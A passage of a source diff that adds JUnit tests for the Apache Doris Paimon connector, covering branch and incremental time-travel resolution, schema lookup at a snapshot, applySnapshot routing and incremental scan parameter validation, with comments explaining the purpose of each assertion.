MUTATION: pinning scan.snapshot-id -> the no-key + // assertion red; validating against the branch table -> the BASE assertion red; loading the + // base table instead of the branch -> the lastMvccTable assertion red. + Assertions.assertEquals(7L, snap.getSnapshotId(), + "@branch must pin the BRANCH's latest snapshot id"); + Assertions.assertEquals(3L, snap.getSchemaId(), + "@branch must stamp the BRANCH's latest snapshot schemaId"); + Assertions.assertEquals("b1", snap.getProperties().get(CoreOptions.BRANCH.key()), + "@branch must carry the branch name under the CoreOptions.BRANCH sentinel key"); + Assertions.assertNull(snap.getProperties().get("scan.snapshot-id"), + "@branch must NOT pin scan.snapshot-id (the branch natively reads its own latest)"); + // The sentinel key must be the SDK key, not a drifting hardcoded string. + Assertions.assertEquals("branch", CoreOptions.BRANCH.key(), + "precondition: the CoreOptions.BRANCH key is 'branch'"); + + // The branch was loaded via a 3-arg branch Identifier (real branch name, no system-table name). + Assertions.assertEquals("b1", ops.lastGetTableId.getBranchName(), + "the branch table must be loaded via a 3-arg branch Identifier"); + Assertions.assertNull(ops.lastGetTableId.getSystemTableName(), + "a branch load must NOT carry a system-table name"); + // The latest-snapshot / schemaId lookups ran against the BRANCH table, not the base. (The last + // seam call before this assertion is snapshotSchemaId, which captured lastMvccTable.) + Assertions.assertSame(branch, ops.lastMvccTable, + "latestSnapshotId/snapshotSchemaId must run against the BRANCH table"); + // branchExists validation ran against the BASE table (legacy resolvePaimonBranch). + Assertions.assertEquals("b1", ops.lastBranchExistsArg, + "branchExists must be asked about the requested branch name"); + // ...and validation ran against the BASE table (ops.table), NOT the freshly loaded branch. + // MUTATION: reordering so branch validation runs after the branch load (or against the branch + // table) -> lastBranchExistsTable would be the branch table -> both assertions red. + Assertions.assertSame(ops.table, ops.lastBranchExistsTable, + "branchExists must validate against the BASE table (legacy resolvePaimonBranch)"); + Assertions.assertNotSame(ops.branchTable, ops.lastBranchExistsTable, + "branchExists must NOT validate against the freshly loaded branch table"); + } + + @Test + public void resolveBranchNotFoundReturnsEmptyAndNeverLoadsBranch() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + ops.branchExists = false; // branch does not exist on the base table + + // WHY: a missing branch must degrade to Optional.empty (empty-if-none; the B5b-3 fe-core + // consumer translates empty into the legacy "can't find branch" UserException), consistent + // with snapshot/tag not-found. The branch table must NEVER be loaded (no latest-snapshot work). + // MUTATION: dropping the branchExists guard -> a snapshot is returned / the branch is loaded -> + // both assertions red. + Assertions.assertFalse(metadataWith(ops) + .resolveTimeTravel(null, handle, ConnectorTimeTravelSpec.branch("nope")).isPresent(), + "a missing branch must yield Optional.empty"); + Assertions.assertFalse(ops.log.contains("latestSnapshotId"), + "a missing branch must NOT load the branch table / look up its latest snapshot"); + } + + @Test + public void resolveBranchEmptyBranchPinsInvalidSnapshotIdAndLatestSchema() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + ops.branchExists = true; + ops.branchTable = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + ops.latestSnapshotId = OptionalLong.empty(); // branch has no snapshot yet + + ConnectorMvccSnapshot snap = metadataWith(ops) + .resolveTimeTravel(null, handle, ConnectorTimeTravelSpec.branch("b1")).get(); + + // WHY: an EMPTY branch (no snapshot) must pin snapshotId=-1 and schemaId=-1 (latest-schema + // fallback) WITHOUT calling snapshotSchemaId(-1), while still carrying the branch sentinel. + // This mirrors the INCREMENTAL empty-table -1 handling (benign divergence from legacy's 0L — + // the resulting schema is identical). MUTATION: calling snapshotSchemaId(-1) -> the log carries + // "snapshotSchemaId:-1" -> red; not stamping -1 -> red; dropping the sentinel -> red. + Assertions.assertEquals(-1L, snap.getSnapshotId(), + "an empty branch must pin the INVALID_SNAPSHOT_ID (-1)"); + Assertions.assertEquals(-1L, snap.getSchemaId(), + "an empty branch must leave schemaId=-1 (latest-schema fallback)"); + Assertions.assertEquals("b1", snap.getProperties().get(CoreOptions.BRANCH.key()), + "an empty branch must still carry the branch sentinel"); + Assertions.assertFalse(ops.log.contains("snapshotSchemaId:-1"), + "an empty branch must NOT resolve schemaId at the invalid snapshot id (-1)"); + } + + @Test + public void getTableSchemaOnEmptyBranchFallsBackToBranchLatestSchema() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); // base table is ops.table (single column "id") + ops.branchExists = true; + // The branch table's rowType DIFFERS from the base so the fallback can be proven to resolve + // the BRANCH table (not the base) when feeding the schemaId=-1 empty-branch snapshot back in. + FakePaimonTable branch = new FakePaimonTable( + "t1", rowType("bid", "bdt"), Collections.emptyList(), Collections.emptyList()); + ops.branchTable = branch; + ops.latestSnapshotId = OptionalLong.empty(); // branch has no snapshot yet + + PaimonConnectorMetadata metadata = metadataWith(ops); + ConnectorMvccSnapshot snap = metadata + .resolveTimeTravel(null, handle, ConnectorTimeTravelSpec.branch("b1")).get(); + // The resolved empty-branch snapshot carries schemaId=-1 (the documented benign divergence). + Assertions.assertEquals(-1L, snap.getSchemaId(), + "precondition: an empty branch resolves schemaId=-1"); + + // Feed that schemaId=-1 snapshot into getTableSchema on the BRANCH handle (the B5b-3 fe-core + // consumer does exactly this after resolveTimeTravel). + PaimonTableHandle branchHandle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()).withBranch("b1"); + ConnectorTableSchema schema = metadata.getTableSchema(null, branchHandle, snap); + + // WHY: the documented schemaId=-1 divergence is BENIGN because schemaId<0 routes to the latest + // fallback, which resolves the BRANCH table (via the 3-arg branch Identifier) and maps the + // BRANCH's latest rowType — identical to what legacy's branch latestSchema would yield. The + // -1 is never passed to schemaAt/snapshotSchemaId. MUTATION: calling schemaAt(-1) (or + // snapshotSchemaId(-1)) instead of the latest fallback -> the log carries "schemaAt:-1" / + // "snapshotSchemaId:-1" -> red; resolving the base table instead of the branch -> columns are + // ["id"] not ["bid","bdt"] -> red. + Assertions.assertEquals(Arrays.asList("bid", "bdt"), columnNames(schema), + "a schemaId=-1 empty-branch snapshot must fall back to the BRANCH table's latest schema"); + Assertions.assertFalse(ops.log.contains("schemaAt:-1"), + "a -1 schemaId must NOT call schemaAt"); + Assertions.assertFalse(ops.log.contains("snapshotSchemaId:-1"), + "a -1 schemaId must NOT resolve schemaId at the invalid snapshot id (-1)"); + } + + @Test + public void resolveBranchOnSysHandleReturnsEmpty() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = sysHandle(ops); + ops.branchExists = true; // would resolve if the sys guard were missing + + // WHY: system tables expose no time-travel (same guard as beginQuerySnapshot / the T19 scan + // fail-loud) — the sys guard must short-circuit BEFORE branchExists is ever consulted. + // MUTATION: dropping the isSystemTable() guard -> branchExists runs (log non-empty) and a + // snapshot is returned -> both assertions red. + Assertions.assertFalse(metadataWith(ops) + .resolveTimeTravel(null, handle, ConnectorTimeTravelSpec.branch("b1")).isPresent(), + "a system table must NOT expose branch time-travel"); Assertions.assertTrue(ops.log.isEmpty(), - "a sys handle must short-circuit before touching the MVCC seam"); + "a sys handle must short-circuit before touching the branch seam"); + } + + // ==================== branchExists seam: graceful non-FileStoreTable path ==================== + + @Test + public void branchExistsOnNonFileStoreTableIsGracefullyFalse() { + // WHY: a non-FileStoreTable backend (e.g. jdbc-only) cannot have branches, so the seam must + // return false gracefully rather than ClassCastException-ing the cast. FakePaimonTable is a + // plain Table (NOT a FileStoreTable), so this pins the instanceof guard. MUTATION: removing + // the instanceof guard -> the cast throws ClassCastException -> red. + PaimonCatalogOps.CatalogBackedPaimonCatalogOps ops = + new PaimonCatalogOps.CatalogBackedPaimonCatalogOps(null); + FakePaimonTable notFileStore = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + + Assertions.assertFalse(ops.branchExists(notFileStore, "b"), + "a non-FileStoreTable backend cannot have branches -> graceful false"); + } + + // ==================== resolveTimeTravel: INCREMENTAL (@incr) ==================== + + @Test + public void resolveIncrementalPinsLatestSnapshotAndThreadsIncrementalBetween() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + ops.latestSnapshotId = OptionalLong.of(9L); + ops.snapshotSchemaId = OptionalLong.of(2L); + Map params = new java.util.HashMap<>(); + params.put("startSnapshotId", "1"); + params.put("endSnapshotId", "5"); + + ConnectorMvccSnapshot snap = metadataWith(ops) + .resolveTimeTravel(null, handle, ConnectorTimeTravelSpec.incremental(params)).get(); + + // WHY: legacy @incr reads at the LATEST snapshot (getProcessedTable copies the incremental + // options onto baseTable, which reads latest) and applies incremental-between at scan time, so + // the pin must carry the latest snapshot id + its schemaId AND the incremental-between option. + // MUTATION: not pinning latest (e.g. -1) -> id != 9 red; dropping the schemaId stamp -> -1 != 2 + // red; not producing incremental-between -> the property assertion red. + Assertions.assertEquals(9L, snap.getSnapshotId(), + "@incr must pin the LATEST snapshot id (legacy reads latest + applies incremental-between)"); + Assertions.assertEquals(2L, snap.getSchemaId(), + "@incr must stamp the latest snapshot's schemaId"); + Assertions.assertEquals("1,5", snap.getProperties().get("incremental-between"), + "@incr (both snapshot ids) must produce incremental-between=start,end"); + } + + @Test + public void resolveIncrementalDoesNotEmitScanSnapshotId() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + ops.latestSnapshotId = OptionalLong.of(9L); + Map params = new java.util.HashMap<>(); + params.put("startSnapshotId", "1"); + params.put("endSnapshotId", "5"); + + ConnectorMvccSnapshot snap = metadataWith(ops) + .resolveTimeTravel(null, handle, ConnectorTimeTravelSpec.incremental(params)).get(); + + // WHY: @incr pins LATEST but must NOT emit scan.snapshot-id — that would conflict with + // incremental-between (legacy nulls scan.snapshot-id for @incr, PaimonScanNode line 842/846). + // applySnapshot threads the NON-EMPTY incremental properties verbatim and skips the + // scan.snapshot-id fallback precisely because properties is non-empty. + // MUTATION: also adding a scan.snapshot-id property (like SNAPSHOT_ID/TIMESTAMP do) -> the + // assertNull below + the applySnapshot end-to-end test go red. + Assertions.assertNull(snap.getProperties().get("scan.snapshot-id"), + "@incr must NOT emit scan.snapshot-id (it would conflict with incremental-between)"); + // And the null-reset keys legacy seeded (scan.snapshot-id / scan.mode) must be ABSENT + // (stripped), NOT present-with-null. WHY: ConnectorMvccSnapshot rejects null values, and a + // fresh per-query Table has no inherited scan.* keys to reset, so stripping is byte-parity. + // MUTATION: re-introducing the null seeds -> containsKey true (or a build-time NPE) -> red. + Assertions.assertFalse(snap.getProperties().containsKey("scan.snapshot-id"), + "the legacy null scan.snapshot-id reset must be STRIPPED, not present-with-null"); + Assertions.assertFalse(snap.getProperties().containsKey("scan.mode"), + "the legacy null scan.mode reset must be STRIPPED, not present-with-null"); + } + + @Test + public void resolveIncrementalEmptyTableFallsBackToInvalidSnapshotIdAndLatestSchema() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + ops.latestSnapshotId = OptionalLong.empty(); // empty table: no snapshot yet + Map params = new java.util.HashMap<>(); + params.put("startTimestamp", "100"); + + ConnectorMvccSnapshot snap = metadataWith(ops) + .resolveTimeTravel(null, handle, ConnectorTimeTravelSpec.incremental(params)).get(); + + // WHY: an empty table must NOT crash the @incr resolve — it falls back to the INVALID_SNAPSHOT_ID + // (-1) and schemaId=-1 (so getTableSchema resolves the LATEST schema, never schemaAt(-1)). The + // incremental window is still produced (read applies it once data exists). + // MUTATION: calling snapshotSchemaId(-1) for an empty table -> the log carries "snapshotSchemaId:-1" + // -> red; not falling back to -1 -> red. + Assertions.assertEquals(-1L, snap.getSnapshotId(), + "@incr on an empty table must fall back to the INVALID_SNAPSHOT_ID (-1)"); + Assertions.assertEquals(-1L, snap.getSchemaId(), + "@incr on an empty table must leave schemaId=-1 (latest-schema fallback)"); + Assertions.assertFalse(ops.log.contains("snapshotSchemaId:-1"), + "an empty table must NOT resolve schemaId at the invalid snapshot id (-1)"); + } + + @Test + public void resolveIncrementalEndToEndAppliesIncrementalOptionsIntoHandle() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + ops.latestSnapshotId = OptionalLong.of(9L); + Map params = new java.util.HashMap<>(); + params.put("startTimestamp", "100"); + params.put("endTimestamp", "200"); + + PaimonConnectorMetadata metadata = metadataWith(ops); + ConnectorMvccSnapshot snap = metadata + .resolveTimeTravel(null, handle, ConnectorTimeTravelSpec.incremental(params)).get(); + PaimonTableHandle pinned = (PaimonTableHandle) metadata.applySnapshot(null, handle, snap); + + // WHY: the full @incr path must end with the incremental-between-timestamp option threaded onto + // the scan handle (NOT scan.snapshot-id), so the scan reads the incremental window. This is the + // contract the B5b-3 fe-core consumer relies on. MUTATION: applySnapshot falling back to + // scan.snapshot-id (because it ignored the non-empty properties) -> the timestamp assertion red + // and the scan.snapshot-id assertion red. + Assertions.assertEquals("100,200", pinned.getScanOptions().get("incremental-between-timestamp"), + "applySnapshot must thread the @incr incremental-between-timestamp option into the handle"); + Assertions.assertFalse(pinned.getScanOptions().containsKey("scan.snapshot-id"), + "an @incr pin must NOT thread scan.snapshot-id (conflicts with the incremental window)"); + } + + // ==================== getTableSchema(snapshot): schema-at-snapshot ==================== + + @Test + public void getTableSchemaAtSchemaIdResolvesHistoricalSchema() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); // latest rowType has only "id" + // The pinned schema has DIFFERENT columns (id, dt) and a partition key — proving the schema + // came from schemaAt(schemaId), not the latest table. + List fields = rowType("id", "dt").getFields(); + ops.schemaAt = new PaimonCatalogOps.PaimonSchemaSnapshot( + fields, Arrays.asList("dt"), Collections.emptyList()); + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder() + .snapshotId(7L).schemaId(2L).build(); + + ConnectorTableSchema schema = metadataWith(ops).getTableSchema(null, handle, snapshot); + + // WHY: under schema evolution a time-travel read must see the schema AS OF the pinned + // schemaId (legacy initSchema(schemaId)), mapping the historical fields + partition keys. + // MUTATION: ignoring the snapshot and returning the latest 1-column schema -> column count / + // names / partition_columns all red. + Assertions.assertEquals(2L, ops.lastSchemaAtArg, + "the schema must be resolved at the snapshot's schemaId"); + Assertions.assertEquals(Arrays.asList("id", "dt"), columnNames(schema), + "the at-snapshot schema's columns must be mapped (not the latest single-column schema)"); + Assertions.assertEquals("dt", schema.getProperties().get("partition_columns"), + "the at-snapshot schema's partition keys must be emitted as partition_columns"); + } + + @Test + public void getTableSchemaWithNegativeSchemaIdFallsBackToLatest() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); // latest rowType has only "id" + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder() + .snapshotId(7L).build(); // schemaId defaults to -1 + + ConnectorTableSchema schema = metadataWith(ops).getTableSchema(null, handle, snapshot); + + // WHY: schemaId < 0 means "unknown schema version" -> the read must fall back to the latest + // schema, NOT call schemaAt (which would pass an invalid -1 to the SDK). MUTATION: calling + // schemaAt(-1) instead of the latest path -> the log carries "schemaAt:-1" -> red. + Assertions.assertEquals(Collections.singletonList("id"), columnNames(schema), + "a -1 schemaId must fall back to the latest schema"); + Assertions.assertFalse(ops.log.contains("schemaAt:-1"), + "a -1 schemaId must NOT call schemaAt"); + } + + private static List columnNames(ConnectorTableSchema schema) { + List names = new java.util.ArrayList<>(); + for (ConnectorColumn c : schema.getColumns()) { + names.add(c.getName()); + } + return names; + } + + // ==================== applySnapshot ==================== + + @Test + public void applySnapshotEmptyPropsFallsBackToScanSnapshotId() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + // A latest-pin snapshot (from beginQuerySnapshot) carries NO properties, only an id. + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder().snapshotId(5L).build(); + + PaimonTableHandle pinned = (PaimonTableHandle) + metadataWith(ops).applySnapshot(null, handle, snapshot); + + // WHY: when the snapshot carries no resolved scan options (the beginQuerySnapshot latest-pin + // path), applySnapshot must FALL BACK to scan.snapshot-id= for B5a parity so the scan + // reads at that exact version. MUTATION: dropping the empty-props fallback -> getScanOptions() + // is empty -> red; wrong id -> value != "5" -> red. + Assertions.assertEquals("5", pinned.getScanOptions().get("scan.snapshot-id"), + "empty-props applySnapshot must fall back to scan.snapshot-id = the snapshot id"); + Assertions.assertTrue(handle.getScanOptions().isEmpty(), + "applySnapshot must NOT mutate the input handle (returns a new pinned copy)"); + } + + @Test + public void applySnapshotThreadsFullPropertiesVerbatim() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + // A TAG time-travel snapshot pins scan.tag-name (NOT scan.snapshot-id) in its properties. + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder() + .snapshotId(42L) + .property("scan.tag-name", "release-1") + .build(); + + PaimonTableHandle pinned = (PaimonTableHandle) + metadataWith(ops).applySnapshot(null, handle, snapshot); + + // WHY: applySnapshot must thread the FULL resolved properties map (here scan.tag-name) so a + // tag read pins the tag, NOT a snapshot id. MUTATION: the old id-only logic would set + // scan.snapshot-id=42 and drop scan.tag-name -> both assertions red. + Assertions.assertEquals("release-1", pinned.getScanOptions().get("scan.tag-name"), + "applySnapshot must thread the resolved scan.tag-name property"); + Assertions.assertNull(pinned.getScanOptions().get("scan.snapshot-id"), + "a tag-name pin must NOT also set scan.snapshot-id (the id is not the scan option)"); + } + + @Test + public void applySnapshotOnSysHandleReturnsHandleUnchanged() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = sysHandle(ops); + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder().snapshotId(5L).build(); + + PaimonTableHandle result = (PaimonTableHandle) + metadataWith(ops).applySnapshot(null, handle, snapshot); + + // WHY: system tables (e.g. t$snapshots) are synthetic metadata views with no MVCC — pinning + // them to a data snapshot is meaningless (same guard as beginQuerySnapshot / the T19 scan + // fail-loud). The sys handle must come back unchanged, NOT carrying scan.snapshot-id. + // MUTATION: dropping the isSystemTable() guard -> getScanOptions() carries scan.snapshot-id + // -> red. + Assertions.assertSame(handle, result, + "a sys handle must be returned unchanged (sys tables have no MVCC)"); + Assertions.assertTrue(result.getScanOptions().isEmpty(), + "a sys handle must NOT be pinned with scan options"); + } + + @Test + public void applySnapshotWithInvalidSnapshotIdReturnsHandleUnchanged() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + // beginQuerySnapshot pins INVALID_SNAPSHOT_ID (-1) for an empty table (NOT Optional.empty), + // and that -1 flows straight back into applySnapshot. + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder().snapshotId(-1L).build(); + + PaimonTableHandle result = (PaimonTableHandle) + metadataWith(ops).applySnapshot(null, handle, snapshot); + + // WHY: an empty-table pin (-1) must NOT become scan.snapshot-id=-1: Table.copy(-1) resolves to + // a non-existent snapshot in the paimon SDK (confusing "snapshot/file not found"). Legacy never + // copied an invalid id — its empty / query-begin path reads latest WITHOUT a copy. So a -1 pin + // must leave the handle UNCHANGED (no scan option -> reads latest). + // MUTATION: removing the -1 guard (pinning -1) -> getScanOptions() carries scan.snapshot-id=-1 + // -> both assertions below go red. + Assertions.assertSame(handle, result, + "an INVALID_SNAPSHOT_ID (-1) pin must return the handle unchanged (read latest)"); + Assertions.assertTrue(result.getScanOptions().isEmpty(), + "a -1 snapshot must NOT pin scan.snapshot-id (would hit a non-existent snapshot)"); + } + + @Test + public void applySnapshotWithNullSnapshotReturnsHandleUnchanged() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + + PaimonTableHandle result = (PaimonTableHandle) + metadataWith(ops).applySnapshot(null, handle, null); + + // WHY: a null snapshot must be tolerated (no NPE on snapshot.getSnapshotId()) and treated as + // "no pin" — same read-latest behavior as the -1 empty-table case. + // MUTATION: dropping the null guard -> snapshot.getSnapshotId() NPEs -> red. + Assertions.assertSame(handle, result, + "a null snapshot must return the handle unchanged (no pin, read latest)"); + Assertions.assertTrue(result.getScanOptions().isEmpty(), + "a null snapshot must NOT pin scan options"); + } + + @Test + public void applySnapshotWithBranchSentinelRoutesToWithBranch() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); // has a transient base Table set + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder() + .snapshotId(7L) + .property(CoreOptions.BRANCH.key(), "b1") + .build(); + + PaimonTableHandle pinned = (PaimonTableHandle) + metadataWith(ops).applySnapshot(null, handle, snapshot); + + // WHY: the CoreOptions.BRANCH sentinel is a handle-IDENTITY change (a different table load), + // NOT a scan option — applySnapshot must route it to withBranch (which clears the transient + // base Table so resolveTable reloads the BRANCH table), detected BEFORE the generic + // properties->withScanOptions path. MUTATION: not special-casing the sentinel -> it falls into + // withScanOptions, so branchName stays null and scanOptions carries "branch" -> all three + // assertions red. + Assertions.assertEquals("b1", pinned.getBranchName(), + "the branch sentinel must route to withBranch (handle identity), not a scan option"); + Assertions.assertTrue(pinned.getScanOptions().isEmpty(), + "a branch pin must NOT thread the sentinel as a scan-copy option"); + Assertions.assertNull(pinned.getPaimonTable(), + "withBranch must clear the transient base Table so the branch reloads"); + } + + @Test + public void applySnapshotScanSnapshotIdStillRoutesToScanOptions() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + // A snapshot-id/timestamp time-travel snapshot pins scan.snapshot-id (no branch sentinel). + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder() + .snapshotId(9L) + .property("scan.snapshot-id", "9") + .build(); + + PaimonTableHandle pinned = (PaimonTableHandle) + metadataWith(ops).applySnapshot(null, handle, snapshot); + + // WHY (regression): adding the branch sentinel branch to applySnapshot must NOT regress the + // existing scan.snapshot-id path — a non-branch property map still routes to withScanOptions + // and leaves branchName null. MUTATION: the branch detection wrongly firing for a non-branch + // map -> branchName non-null / scanOptions empty -> both assertions red. + Assertions.assertEquals("9", pinned.getScanOptions().get("scan.snapshot-id"), + "a non-branch property map must still route to withScanOptions"); + Assertions.assertNull(pinned.getBranchName(), + "a non-branch pin must leave branchName null"); + // The transient Table must be PRESERVED: withScanOptions carries it over (same table, read at + // a version). MUTATION: a mistaken withBranch route (which clears the transient Table to force + // a branch reload) -> pinned.getPaimonTable() null -> red. + Assertions.assertSame(handle.getPaimonTable(), pinned.getPaimonTable(), + "withScanOptions must preserve the transient Table (not clear it like withBranch)"); + } + + // ==================== getTableSchema(snapshot): branch-aware ==================== + + @Test + public void getTableSchemaAtSchemaIdOnBranchHandleResolvesBranchSchema() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + // A branch-aware handle with NO transient Table (forces a branch reload), built via withBranch. + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()).withBranch("b1"); + // ops.table is the BASE (single column "id"); the branch table has different fields. + ops.table = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + FakePaimonTable branch = new FakePaimonTable( + "t1", rowType("bid", "bdt"), Collections.emptyList(), Collections.emptyList()); + ops.branchTable = branch; + // The at-schemaId schema (resolved through schemaAt) carries the branch's historical fields. + ops.schemaAt = new PaimonCatalogOps.PaimonSchemaSnapshot( + rowType("bid", "bdt").getFields(), Arrays.asList("bdt"), Collections.emptyList()); + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder() + .snapshotId(7L).schemaId(2L).build(); + + ConnectorTableSchema schema = metadataWith(ops).getTableSchema(null, handle, snapshot); + + // WHY: getTableSchema(snapshot) with schemaId>=0 resolves schemaAt(resolveTable(handle)). For a + // branch handle, resolveTable reloads the BRANCH table, so schemaAt runs against the branch's + // schemaManager — branch-correct automatically (no branch logic in getTableSchema itself). + // MUTATION: resolveTable loading the base table instead of the branch -> schemaAt ran against + // ops.table (the base) -> the lastMvccTable assertion red. + Assertions.assertEquals(2L, ops.lastSchemaAtArg, + "the schema must be resolved at the snapshot's schemaId"); + Assertions.assertEquals(Arrays.asList("bid", "bdt"), columnNames(schema), + "the at-snapshot schema's columns must come from the BRANCH schema"); + Assertions.assertSame(branch, ops.lastMvccTable, + "schemaAt must run against the BRANCH table (resolveTable loaded the branch)"); + } + + @Test + public void getTableSchemaLatestOnBranchHandleResolvesBranchRowType() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()).withBranch("b1"); + ops.table = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + FakePaimonTable branch = new FakePaimonTable( + "t1", rowType("bid", "bdt"), Collections.emptyList(), Collections.emptyList()); + ops.branchTable = branch; + // schemaId < 0 -> latest fallback (no schemaAt); the columns must be the BRANCH table's fields. + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder().snapshotId(7L).build(); + + ConnectorTableSchema schema = metadataWith(ops).getTableSchema(null, handle, snapshot); + + // WHY: with schemaId<0 the latest fallback resolves resolveTable(handle).rowType(); for a + // branch handle that is the BRANCH table's rowType (proving resolveTable loaded the branch via + // the 3-arg branch Identifier, not the base). MUTATION: resolveTable loading the base -> + // columns are ["id"] not ["bid","bdt"] -> red; calling schemaAt(-1) -> "schemaAt:-1" in log. + Assertions.assertEquals(Arrays.asList("bid", "bdt"), columnNames(schema), + "the latest fallback on a branch handle must resolve the BRANCH table's rowType"); + Assertions.assertFalse(ops.log.contains("schemaAt:-1"), + "a -1 schemaId must NOT call schemaAt"); } // ==================== capabilities ==================== diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParamsTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParamsTest.java new file mode 100644 index 00000000000000..908d7fb1f0804c --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParamsTest.java @@ -0,0 +1,243 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.DorisConnectorException; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.Map; + +/** + * Mutation-killing tests for {@link PaimonIncrementalScanParams#validate}, the byte-faithful port of + * legacy {@code PaimonScanNode.validateIncrementalReadParams} (lines 701-878). Each test encodes WHY + * a rule matters (a wrong window silently reads the WRONG incremental diff -> wrong rows), and pins + * the EXACT legacy error message so the connector's {@link DorisConnectorException} stays parity with + * the legacy {@code UserException}. The two parameter groups (snapshot-based vs timestamp-based) are + * mutually exclusive; the produced map carries ONLY the non-null {@code incremental-between*} keys + * (the legacy null {@code scan.snapshot-id}/{@code scan.mode} resets are STRIPPED). + */ +public class PaimonIncrementalScanParamsTest { + + private static Map params(String... kv) { + Map m = new HashMap<>(); + for (int i = 0; i < kv.length; i += 2) { + m.put(kv[i], kv[i + 1]); + } + return m; + } + + // ==================== mutual exclusion / required-start / empty ==================== + + @Test + public void snapshotAndTimestampGroupsAreMutuallyExclusive() { + // WHY: mixing snapshot ids and timestamps is ambiguous (two contradictory window definitions); + // legacy rejects it outright. MUTATION: dropping the mutual-exclusion check -> one group wins + // silently -> no throw -> red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> PaimonIncrementalScanParams.validate( + params("startSnapshotId", "1", "endSnapshotId", "2", "startTimestamp", "100")), + "snapshot-based and timestamp-based params must be mutually exclusive"); + Assertions.assertTrue(ex.getMessage().contains("Cannot specify both snapshot-based parameters"), + "the mutual-exclusion error must match the legacy message verbatim"); + } + + @Test + public void emptyParamsAreInvalid() { + // WHY: @incr with no window is meaningless; legacy fails loud rather than reading everything. + // MUTATION: returning an empty map instead of throwing -> no throw -> red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> PaimonIncrementalScanParams.validate(params()), + "no incremental params at all must be rejected"); + Assertions.assertTrue(ex.getMessage().contains("at least one valid parameter group"), + "the empty-params error must match the legacy message"); + } + + @Test + public void snapshotGroupRequiresStart() { + // WHY: an incremental window needs a START; only endSnapshotId (no start) is invalid. This is + // the snapshot-group "start required" rule (legacy line 732-734). MUTATION: not requiring start + // -> no throw -> red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> PaimonIncrementalScanParams.validate(params("endSnapshotId", "5")), + "snapshot-based incremental read must require startSnapshotId"); + Assertions.assertTrue(ex.getMessage().contains( + "startSnapshotId is required when using snapshot-based incremental read"), + "the missing-start error must match the legacy message"); + } + + @Test + public void scanModeOnlyWithBothStartAndEnd() { + // WHY: incrementalBetweenScanMode describes HOW to diff a [start,end] range, so it is illegal + // without BOTH 